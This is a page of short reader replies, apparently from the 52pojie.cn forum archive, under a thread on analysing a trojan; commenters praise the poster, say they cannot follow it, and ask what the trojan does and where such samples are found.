明次发表于 2010-3-5 20:56

当哥懂得还真多啊

huyijunjj 发表于 2010-3-5 21:08

强悍的，我是一窍不通！顶！

qyc0129 发表于 2010-3-5 21:13

这个木马是干什么的

Skyfly 发表于 2010-3-5 21:27

可耻的一窍不通

czjh2008 发表于 2010-3-5 21:36

呵呵！看不懂……

小贱发表于 2012-7-8 12:05

看不懂· 啊~

wanjuq 发表于 2012-7-23 22:49

菜鸟学习一下！

ga89 发表于 2012-11-30 19:59

仔细看了，还是找不出是哪里出现问题。我太菜了

lo.1 发表于 2012-12-5 16:58

{:1_918:}这些木马哪找的？

页: [1] 2

吾爱破解 - 52pojie.cn's Archiver

某木马分析 by 当红小生[LSG]